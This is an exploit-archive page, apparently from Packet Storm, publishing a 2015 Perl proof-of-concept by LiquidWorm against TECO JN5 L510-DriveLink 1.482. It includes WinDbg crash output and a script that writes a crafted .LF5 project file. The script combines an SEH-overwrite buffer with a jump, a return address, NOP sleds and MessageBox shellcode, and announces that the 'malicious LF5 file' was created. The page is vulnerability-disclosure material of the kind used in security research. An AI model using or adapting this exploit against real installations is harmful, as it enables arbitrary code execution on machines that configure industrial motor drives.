exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow

TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow
Posted Nov 17, 2015
Authored by LiquidWorm | Site zeroscience.mk

TECO JN5 L510-DriveLink version 1.482 suffers from a vulnerability that is caused due to a boundary error in the processing of a project file, which can be exploited to cause a buffer overflow when a user opens e.g. a specially crafted .LF5 file. Successful exploitation could allow execution of arbitrary code on the affected machine.

tags | exploit, overflow, arbitrary
SHA-256 | 0a17862b17b3d467c4d8f98421a8360fdbcb7dc4e4083cf422ec3cebfc1dcc18

TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#
# TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.482 and 1.462
#
# Summary: JN5 DriveLink is a free program that enables you to
# configure the AC Motor Drive, 510 Series PC-Link. It provides
# support for sleep and fire modes favourable for pumps, fans,
# compressors, and HVAC and communication network protocol of
# Modbus/ BACnet/ Metasys N2.
#
# Desc: The vulnerability is caused due to a boundary error in the
# processing of a project file, which can be exploited to cause a
# buffer overflow when a user opens e.g. a specially crafted .LF5 file.
# Successful exploitation could allow execution of arbitrary code on
# the affected machine.
#
# ---------------------------------------------------------------------------------
# (14c0.12ec): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42.DLL -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961
# eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
# MFC42!Ordinal2740+0xaa:
# 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=????????
# 0:000> !exchain
# 0018f3e4: 41414141
# Invalid exception stack at 41414141
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5279
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php
#
#
# 09.10.2015]
#


my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31".
"\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00";

# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";

my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627;

my $file = "Gaming Nerdz.lf5";
my $junk = $header.$buffer;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious LF5 file created successfully!\n";
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close